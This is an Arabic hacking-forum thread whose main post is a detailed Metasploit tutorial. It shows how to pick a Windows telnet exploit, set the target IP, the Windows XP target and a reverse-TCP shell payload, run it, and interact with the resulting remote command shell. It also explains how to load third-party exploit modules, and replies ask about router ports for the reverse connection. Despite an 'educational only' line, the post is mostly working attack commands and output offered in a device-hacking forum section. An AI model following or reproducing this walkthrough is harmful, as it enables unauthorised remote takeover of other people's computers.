استخدام برنامج ][ M e t a s p l o i t ][ و شرح ثغراته بالتفصيل

استخدام برنامج ][ M e t a s p l o i t ][ و شرح ثغراته بالتفصيل


النتائج 1 إلى 4 من 4

الموضوع: استخدام برنامج ][ M e t a s p l o i t ][ و شرح ثغراته بالتفصيل

  1. #1
    هكر متميز الصورة الرمزية hackerpk
    تاريخ التسجيل
    Jan 2013
    الدولة
    مغربي في اسبانيا
    المشاركات
    1,165

    افتراضي استخدام برنامج ][ M e t a s p l o i t ][ و شرح ثغراته بالتفصيل

    بسم الله الرحمن الرحيم

    السلآم عليكم

    عدت لكم بمفآآجأة من العيآر الثقيل


    عنوآآن الشرح :

    ][ استخدام برنامج M e t a s p l o i t و شرح ثغراته بالتفصيل ][



    مقدمة :


    إلى متى ونحن نستخدم الـ بآآتشات ,,

    واصنع باتش ثم شفر ثم ادمج ثم غير الايقونة .. << أصبحت الطريقة قديمة ومشهورة

    لكن معنآ اليوم .. برنآمج الميتا .. أغلبكم سمع به او قرأ عنه ..

    لكن ,, قليل من عمل عليه ..

    نبدأ بالشرح بإذنه تعالى


    لكل من لا يعرف البرنامج اقرأ الموضوع .. ::

    بدأ مشروع ثغرات M e t a s p l o i t في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع M e t a s p l o i t على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بياناتs h e e l c o d eو Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذا…
    لكل شيء محاسن و مساوء قوة مشروع ميتاسبلويت و سهولة استخدامه جعلت الكثيرين من الأطفال الذين يظنون أنفسهم Hackers يستخدمه لاختراق أجهزة الآخرين و التحكم بها بتنفيذ بضعة أوامر دون أي معرفة أو فهم بالثغرة, سببها, برمجتها أو حتى كيفية استغلالها و بصراحة ترددت كثيرا عند كتابة هذا الموضوع لأن الاختراق باستخدام مشروع ميتاسبلويت سهل جدا و احترافي لدرجة أننا قد نتمكن من اختراق جميع الأجهزة الموجودة معنا على الشبكة بسهولة و بتطبيق عدة أوامر فقط! و قبل أن أبدأ يجب معرفة أن الشرح للغرض العلمي فقط! و أنا لا أشجع أحد على تجربة ما ذكر هنا خارج نطاق شبكته الخاصة أو بدون اذن مسبق من مدير الشبكة و رغم محاولتي لتفصيل أغلب الخطوات المذكوره في الشرح الا أنه ليس موجه للمبتدئين أو للأشخاص الذين لا يملكون معرفة مسبقة بهذه الأمور و لن يتم التطرق لكيفية تنصيب المشروع على الجهاز فهذه الأشياء يجب أن تكون من البديهيات, سأستخدم سطر الأوامر بشكل أساسي و التطبيق سيكون على نظام Linux توزيعة BackTrack 3 على الاصدار 3.2 من مشروع ميتاسبلويت مع العلم من الممكن تطبيق بعض ما ذكر هنا على نظام ويندوز لكني لا أنصح بذلك!
    نبدأ بفتح سطر الأوامر و من ثم الذهاب للمجلد الموجود به مشروع M e t a s p l o i t في توزيعة BackTrack 3 سيكون المشروع في المسار التالي:
    كود:
    /pentest/exploits/framework3/
    بعد ذلك نقوم بتشغيل سطر أوامر مشروعM e t a s p l o i t بتنفيذ الأمر:
    كود:
    ./msfconsole

    أول ما يبدأ سطر أوامر M e t a s p l o i t يعطينا معلومات عن حالة المشروع مثل الاصدار, عدد الثغرات الموجودة, عدد الأدوات و الـ Payloads و غيرها من الأمور الأخرى مايهمنها حاليا الثغرات فقط و هذا ما سأشرحه هنا. لنتمكن من استغلال ثغرة M e t a s p l o i tهنالك بضعة خطوات يجب القيام بها, تختلف هذه الخطوات و الخيارات من ثغرة لأخرى الا أنها متشابهة بشكل عام. أول شيء علينا تحديد الثغرة التي نريد استغلالها بعد ذلك نحدد الخيارات الخاصة بها مثل الاصدار المصاب, نظام التشغيل, الاستغلال… ثم ننفذ الثغرة و نستخدمها حسب الاستغلال المحدد في الخيارات, يوجد الكثير من الأوامر التي يمكننا استخدامها في مشروع ميتاسبلويت لمعرفتها نقوم بتنفيذ الأمر التالي:
    كود:
    msf > help

    ما يهمنا حاليا في استغلال الثغرات هي الأوامر المظللة في الصورة
    كود:
    msf > show exploits
    msf > info exploit
    msf > use exploit
    نستخدم الأمر الأول لاظهار الثغرات الموجودة في المشروع أما الثاني لاظهار معلومات مفصلة عن الثغرة و مصادر خارجية عنها و الثالث لاستخدام الثغرة و تحديد خياراتها, أول شيء ننفذ الأمر الأول لاستعراض الثغرات الموجودة في المشروع
    كود:
    msf > show exploits

    كما هو واضح تم اظهار عدد كبير من الثغرات و بجانب كل ثغرة معلومات بسيطة عن البرنامج/النظام و الاصدار المصاب و لاظهار معلومات مفصلة عن احدى الثغرات يكفي تنفيذ الأمر info , مثال على ذلك:
    كود:
    msf > info windows/********************/cc********************_telnet_ping
    بعد تنفيذ الأمر السابق سيتم اظهار كافة المعلومات المتوفرة عن الثغرة الموجودة في برنامج CC******************** الاصدار 6.2 كما هو واضح في الصورة التالية:

    قبل البدء باستخدام الثغرة نلاحظ الخيارات المتوفرة لها و كما قلت سابقا تختلف الخيارات من ثغرة لأخرى لكن في هذه الثغرة يوجد لدينا خيارين أساسيين الأول هو IP السيرفر الذي يستعمل برنامج CC******************** أما الثاني فهو المنفذ الذي يستخدمه البرنامج, أيضا لا ننسى تحديد النظام فهذا شيء مهم في ثغرات M e t a s p l o i t خصوصا أنظمة Windows و اصداراتها و علينا معرفة أن استغلال هذه النوعية من الثغرات دقيق جدا و صعوبة استغلالها تكمن في دقتها فأي خيار خاطئ نحدده لن يمكننا من استغلال الثغرة بشكل صحيح, الأن ننفذ الأمر use لنستخدم الثغرة
    كود:
    msf > use windows/********************/cc********************_telnet_ping
    و نستخدم الأمر show لاظهار خيارات الثغرة المتوفرة
    كود:
    msf exploit(cc********************_telnet_ping) > show options
    نحدد الخيارات التي تناسبنا باستخدام الأمر set كما هو واضح من الصورة التالية:

    أول شيء أظهرنا خيارات الثغرة باستخدام الأمر السابق ثم حددنا الخيار RHOST وهو IP الجهاز المستهدف و ذلك باستخدام الأمر:
    كود:
    msf exploit(cc********************_telnet_ping) > set RHOST 192.168.0.53
    بالنسبة لي كان 192.168.0.53 و أبقيت الخيار RPORT نفسه 23 و هو المنفذ الذي يستخدمه برنامج CC******************** بشكل افتراضي و طبعا يمكن تغييره بحسب المنفذ المستخدم مثلا 34 باستخدام الأمر:
    كود:
    msf exploit(cc********************_telnet_ping) > set RPORT 34
    بعد ذلك نقوم باظهار الأنظمة المتاحة باستخدام الأمر:
    كود:
    msf exploit(cc********************_telnet_ping) > show targets
    نحدد الخيار 4 و هو نظام Windows XP SP2 – English بتنفيذ:
    كود:
    msf exploit(cc********************_telnet_ping) > set TARGET 4

    يتــــــــــــبع ..



    تآآبع



    أما الآن نظهر الاستغلالات المتاحة لهذه الثغرة باستخدام الأمر:
    كود:
    msf exploit(cc********************_telnet_ping) > show payloads
    بالنسبة لي سأحدد الاستغلال windows/s h e l l _reverse_tcp و يستخدم هذا الاستغلال لانشاء اتصال عكسي مع الجهاز الذي تم تنفيذ الثغرة عليه و نتحكم بالاتصالات من داخل مشروع ميتاسبلويت
    كود:
    msf exploit(cc********************_telnet_ping) > set PAYLOAD windows/s h e l l l_reverse_tcp
    << "" للتنبيه فقط كلمة s h e l l بدون مسافات بين الحروف""

    مع العلم من امكانية تحديد أي استغلال آخر نريد مثل تنفيذ أمر محدد على النظام, فتح منفذ و الاتصال به عن طريق أداة الـ Netcat, تحميل ملف و تشغيله أو حتى اضافة مستخدم جديد للنظام بصلاحيات Administrator, الأن ننفذ الأمر:
    كود:
    msf exploit(cc********************_telnet_ping) > show options
    من جديد لمراجعة الخيارات المخصصة للثغرة أو لتعديل أي خيار مثل ما هو واضح بالصورة التالية:



    يمكننا الأن تحديد خيارات الاستغلال مثل LHOST وهو IP جهازنا و LPORT هو المنفذ الذي سيتم الاتصال العكسي عن طريقه بتنفيذ الأمر:
    كود:
    msf exploit(cc********************_telnet_ping) > set LHOST 192.168.0.41
    بالنسبة لي سأترك المنفذ 4444 نفسه دون تغيير, الأن لم يبقى علينا الا تطبيق الأمر
    كود:
    msf exploit(cc********************_telnet_ping) > exploit
    لتنفيذ الثغرة و اذا كانت جميع الخيارات صحيحة سيتم تنفيذ الاستغلال و لنتمكن من مشاهدة الاتصالات العكسية الموجودة ننفذ الأمر:
    كود:
    msf > sessions -l Active sessions
    ===============
    Id Description Tunnel
    -- ----------- ------
    1 Command L H O S Tl 192.168.0.41:23443 -> 192.168.0.53:1032

    ""<< كذلك كلمة L H O S T بدون مسافات""
    و من ثم ننفذ الأمر التالي للاتصال باحدى الاتصالات المتاحة و في هذه الحالة هو رقم 1
    كود:
    msf > sessions -i 1[*] Starting interaction with 1...
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\WINDOWS\system32>
    مع العلم من امكانية تنفيذ أكثر من استغلال على أكثر من جهاز و الحصول على اتصالات أخرى.. أو القيام بهذه العملية بشكل أوتوماتيكي باستخدام احدى أدوات ميتاسبلويت الخطيرة و هي db_autopwn التي سأترك شرحها لموضوع آخر و طبعا يوجد الكثير من الاستغلالت الأخرى أترك تجربتها لكم.

    كل ما ذكر سابقا مجرد مثال بسيط عن احدى ثغرات الميتاسبلويت لكن المشروع أقوى من ذلك بكثير و يوجد له استخدمات و ثغرات أخرى قوية قد أشرحها قريبا ان شاء الله, كل ماعليك الأن هو التجربة و اعادة المحاولة و لا تتوقع أن تتمكن من استغلال الثغرة من أول مرة أو ثاني مرة و لا حتى بعد 10 مرات كل مرة تجرب بها ثغرة ستكشف شيء جديد و خطأ قمت به و تذكر أن الدقة أهم شيء في استغلال ثغرات مشروع الميتاسبلويت فتحديد البرنامج و الاصدار المصاب أصعب من استغلال الثغرة المكتوبة له. من الجميل أيضا في مشروع ميتاسبلويت هو وجود واجهات رسومية جميلة لتسهيل التعامل مع المشروع و مخصصة للأشخاص الذين لايحبون استخدام سطر الأوامر

    الواجهة الرسومية العادية GUI لتشغيلها ننفذ الأمر التالي داخل مجلد مشروع M e t a s p l o i t
    كود:
    ./msfgui

    الواجهة التي تعمل من المتصفح لتشغيلها ننفذ الأمر التالي داخل مجلد المشروع
    كود:
    ./msfw e b

    "" كذلك w e b بدون مسافات ""

    بعد ذلك نفتح المتصفح على الرابط
    كود:
    http://127.0.0.1:55555
    ماذا بعد؟ لنفرض الآن أننا نريد استغلال ثغرة غير موجودة في مشروع الميتاسبلويت أحضرناها من موقع Milw0rm مثلا كيف سنضيفها؟ بصراحة وجدت الكثيرين لا يعرفون الطريقة رغم بساطتها و طبعا الشرح للينوكس و نصيحة للجميع ابتعدوا عن ويندوز في هذه الأمور, كما نعرف في الاصدار 2 السابق من مشروع M e t a s p l o i t كان المشروع و ثغراته تبرمج بلغة Perl و تأتي بالامتداد pm أما في الاصدار 3 تم اعادة برمجة المشروع من جديد بلغة Ruby و تأتي الثغرة بالامتداد rb لذلك أول شيء علينا معرفة نوعية الثغرة هل هي للاصدار 3.0 أم لاصدارات سابقة 2.0 ؟ أتوقع أن الاختلاف بين الكود البرمجي بين اللغتين واضح جدا (مثال عن ثغرة للاصدار 2 – مثال عن ثغرة للاصدار 3) طبعا الشرح هنا موجه للاصدار 3.0 فهذا مانتكلم عنه في هذا الموضوع, اذا اطلعنا على كود الثغرة و ركزنا على السطر التالي:
    كود:
    class Exploits::Windows:: Driver::Intel_Centrino_2200BG_driver_probe < Msf::Exploit::Remote
    سنعرف أن الثغرة لنظام Windows مصنفة في Driver اسمها Intel_Centrino_2200BG_driver_probe الأن كل ماعلينا هو التوجه للمجلد الموجود في المسار التالي:
    كود:
    /home/USER/.msf3/
    طبعا مع استبدال USER باسم المستخدم عندك في نظام لينوكس و اذا لم يكن المجلد موجود يمكننا انشاؤه ببساطة! أما اذا كنت تعمل بالمستخدم root كما في توزيعة BackTrack سيكون مسار المجلد:
    كود:
    /root/.msf3
    بعد الدخول للمجلد ننشئ مجلد جديد باسم modules بداخله مجلد آخر باسم exploits ليصبح المسار النهائي بهذا الشكل:
    كود:
    /home/USER/.msf3/modules/exploits
    الأن ننشئ بداخل مجلد exploits مجلد باسم windows بداخله مجلد driver بعد ذلك ندخل للمجلد driver و ننشئ ملف الثغرة باسم Intel_Centrino_2200BG_driver_probe متبوعا بالامتداد .rb و بداخله كود الثغرة كامل ليصبح مسار الثغرة النهائي:
    كود:
    /home/USER/.msf3/modules/exploits/windows/driver/Intel_Centrino_2200BG_driver_probe.rb
    جميل جدا الأن كل ماعلينا هو تشغيل سطر أوامر مشروع M e t a s p l o i t من جديد و ملاحظة عدد الثغرات قبل و بعد تطبيق ما سبق و سنلاحظ وجود الثغرة ضمن قائمة الثغرات الموجودة في المشروع!


    أما اذا أردنا تحديث المشروع بشكل كامل و اضافة ثغرات و أدوات جديدة.. يكفي الدخول لمجلد المشروع و من ثم تطبيق الأمر التالي:
    كود:
    svn update


    سَأعيشُ رَغْمَ الدَّاءِ والأَعْداءِ كالنِّسْر فوقَ القِمَّة ِ الشَّمَّاءِ
    أَرْنو إِلَى الشَّمْسِ المضِيئّة ِ هازِئاً بالسُّحْبِ والأمطارِ والأَنواءِ
    لا أرمقُ الظلَّ الكئيبَ ولا أَرى ما في قرار الهَوّة ِ السوداءِ
    وأقول للقَدَرِ الذي لا يَنْثني عن حرب آمالي بكل بلاءِ
    فاهدمْ فؤادي ما استطعتَ فإنَّهُ سيكون مثلَ الصَّخْرة الصَّمَّاءِ



    omri hackerpk:psyco canon

  2. #2

    افتراضي رد: استخدام برنامج ][ M e t a s p l o i t ][ و شرح ثغراته بالتفصيل

    موضوع جميل بارك الله فيك
    لكن الصور غير موجودة
    وعندي سؤال .... عندما (قلت بالنسبة لي كان 192.168.0.53 و أبقيت الخيار rport نفسه 23 و هو المنفذ الذي يستخدمه برنامج cc******************** بشكل افتراضي و طبعا يمكن تغييره بحسب المنفذ المستخدم مثلا 34 باستخدام الأمر) يجب أن نقتح بورت 23 في الراوتر تاعنا ولا لا فقط البورت 4444 يحب أن يكون مفتوح ؟؟؟

  3. #3

    افتراضي رد: استخدام برنامج ][ M e t a s p l o i t ][ و شرح ثغراته بالتفصيل

    شكرا جزيلا أخي الفاضل شكرا جزيلا أخي الفاضل

    - - - تم التحديث - - -

    شكرا جزيلا أخي الفاضل

  4. #4

    افتراضي رد: استخدام برنامج ][ M e t a s p l o i t ][ و شرح ثغراته بالتفصيل

    مشكور للطرح بارك الله فيك
    لـن نرحم الضعفاء حتى يصبحوا اقوياء واذا اصبحوا اقوياء فلن تجوز الرحمة عليهم

    اذا مدت يدك لتمسني سأرفع قبعتي احتراماً لشجاعتك ولكن تأكد اني لن أنزلها إلا على قبرك


    يوجد ايميلات ثلاثية للمبادلة



المواضيع المتشابهه

  1. شرح استخدام برنامج BifrosT
    بواسطة noureno-rca في المنتدى قسم اختراق الأجهزة
    مشاركات: 12
    آخر مشاركة: 10-07-2012, 01:07 AM
  2. إقفل اي ملف بدون استخدام برنامج 100%
    بواسطة Omar hcj في المنتدى منتدى البرامج - تحميل برامج
    مشاركات: 3
    آخر مشاركة: 07-19-2012, 09:17 PM
  3. مشاركات: 18
    آخر مشاركة: 03-08-2012, 08:51 PM
  4. برنامج Poison Ivy + شرح بالتفصيل الممل
    بواسطة Resident Evil في المنتدى قسم اختراق الأجهزة
    مشاركات: 29
    آخر مشاركة: 01-02-2012, 09:55 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •